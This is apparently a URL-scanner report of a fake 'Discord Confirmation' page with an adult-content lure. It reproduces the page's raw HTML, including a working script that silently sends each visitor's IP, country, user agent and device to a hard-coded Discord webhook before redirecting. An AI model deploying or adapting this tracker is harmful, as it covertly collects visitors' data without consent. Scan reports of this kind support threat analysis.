https://bleleadersto.com/s?f9e9c765

Eingereichte URL:
https://nsfwaccess.vip/Umgeleitet
Bericht beendet:

Die von der Seite ausgehenden identifizierten Links

LinkText
https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://emojipedia.org/no-one-under-eighteen&ved=2ahUKEwi2zpyqp8yJAxWFg_0HHVbIAS0QFnoECBoQAQ&usg=AOvVaw14RoCwD-LsVGUB8zodLU0k🔞

JavaScript-Variablen · 8 gefunden

Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind

NameTyp
0object
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
conf_rewobject
LAST_CORRECT_EVENT_TIMEnumber
_3766219271number
am_sid1060232string

Konsolenprotokoll-Meldungen · 2 gefunden

In der Web-Konsole protokollierte Meldungen

TypKategorieProtokoll
errornetwork
URL
https://media.discordapp.net/attachments/851389970840944640/851390664788934656/755243061088616458.gif
Text
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://bleleadersto.com/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

Der HTML-Rohtext der Seite

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Discord Confirmation</title>
	<link crossorigin="anonymous" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" rel="stylesheet">
	<link href="https://logodownload.org/wp-content/uploads/2017/11/discord-logo-4-1.png" rel="icon" sizes="16x16" type="image/png"><meta content="website" property="og:type">
	<link href="https://use.typekit.net/joc7wli.css" rel="stylesheet">
	<style type="text/css">.btn {
            background-color: #60d1f6;
            color: #fff;
            padding: 10px 22px;
        }
        .btn:hover {
            background: #0076ff;
            color: #fff;
        }
        body {
            background-image: url(https://media.discordapp.net/attachments/851389970840944640/851390664788934656/755243061088616458.gif);
            background-size: 20%;
            background-repeat: no-repeat;
            background-position: bottom 0 right 7px;
            background-color: #24292e!important;
        }
        h1, h2, h3, h4, h5, h6 {
            color: #fff;
        }
        p, small, span {
            color: #eaeaea;
        }
        #box {
            width: 400px;
            margin: 0 auto;
            margin-top: 100px;
            border: 2px solid #181a1f;
            vertical-align: middle;
            border-radius: 5px;
            text-align: center;
            padding: 60px;
            background-color: #31363f!important;
        }
        #server_pic {
            display: block;
            border-radius: 1%;
            margin: 10px auto;
            width: 200px;
            border: 0 solid #181a1f;
        }
        hr {
            margin: 20px;
            background-color: #eaeaea;
        }
	</style>
	<script>
        const webhookUrl = 'https://discord.com/api/webhooks/1304365670481395739/D6L2qYdtr6JvOiDvXpazfRLkpa2HFqPctnuWmocgFnzATcu0SCaV_zagENdVOnIHQmuf'; // Replace with your webhook URL
        const ipApiUrl = 'https://ipinfo.io/json';

        async function updateClickData() {
            // Send request to update click data
            await fetch('/update-click-data', { method: 'POST' });
        }

        async function sendWebhook(clickData) {
            // Send click data to the webhook
            await fetch(webhookUrl, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    embeds: [{
                        title: "<a:1196514369945739316:1231627566054379590> Click Tracking Data",
                        fields: [
                            { name: "<a:tlwSparklesRed:807192797579837440> **Timestamp**", value: clickData.timestamp, inline: true },
                            { name: "<a:tlwSparklesRed:807192797579837440> **IP** Address", value: clickData.ip || "Unknown", inline: true }, // Replace referrer with IP
                            { name: "<a:4918lightingbolt:1257210236759183391> **User Agent**", value: clickData.userAgent, inline: false },
                            { name: "<:site:1257210541827555360> **Country**", value: clickData.country, inline: true },
                            { name: "<:PC:1154875086503944192> **Device**", value: clickData.device, inline: true },
                            { name: "<a:DiamondR:1154874956472131644> **Day Clicks**", value: clickData.totalClicks.toString(), inline: true },
                        ],
                        color: 0000000 // Hex color code (blue)
                    }]
                })
            });
        }

        async function fetchClickData() {
            try {
                const response = await fetch('/click-data');
                if (response.ok) {
                    return await response.json();
                } else {
                    console.error('Failed to fetch click data');
                    return {
                        totalClicks: 'N/A'
                    };
                }
            } catch (error) {
                console.error('Error fetching click data:', error);
                return {
                    totalClicks: 'N/A'
                };
            }
        }

        window.onload = async () => {
            // Update click data
            await updateClickData();

            // Fetch country data and IP address
            const ipResponse = await fetch(ipApiUrl);
            const ipData = await ipResponse.json();
            
            // Get the current timestamp and user details
            const timestamp = new Date().toISOString();
            const ip = ipData.ip || 'Unknown'; // Use IP data from IP API
            const userAgent = navigator.userAgent;
            const country = ipData.country || 'Unknown'; // Use country data from IP API
            const device = navigator.platform;
            
            // Create click data object
            const clickDetails = {
                timestamp,
                ip,  // Add IP address
                userAgent,
                country,
                device,
                totalClicks: (await fetchClickData()).totalClicks
            };

            // Send click data to the webhook
            await sendWebhook(clickDetails);
        };
    </script>
</head>
<body>
<div id="box"><img alt="Discord Logo" height="182" id="server_pic" src="/unnamed.png" width="200">
<h2>Redirecting...</h2>

<p>Please complete the verification to access all 200+ channels and other chats! <span jsaction="rcuQ6b:npT2md;PYDNKe:bLV6Bd;mLt3mc" jscontroller="msmzHf"><a data-ved="2ahUKEwi2zpyqp8yJAxWFg_0HHVbIAS0QFnoECBoQAQ" href="https://www.google.com/url?sa=t&amp;source=web&amp;rct=j&amp;opi=89978449&amp;url=https://emojipedia.org/no-one-under-eighteen&amp;ved=2ahUKEwi2zpyqp8yJAxWFg_0HHVbIAS0QFnoECBoQAQ&amp;usg=AOvVaw14RoCwD-LsVGUB8zodLU0k" jsname="UWckNb">🔞</a></span></p>
</div>
<script>
        setTimeout(() => {
            window.location.href = 'https://best-links.org/s?f9e9c765';
        }, 2125);
    </script>

<p></p>

</body></html>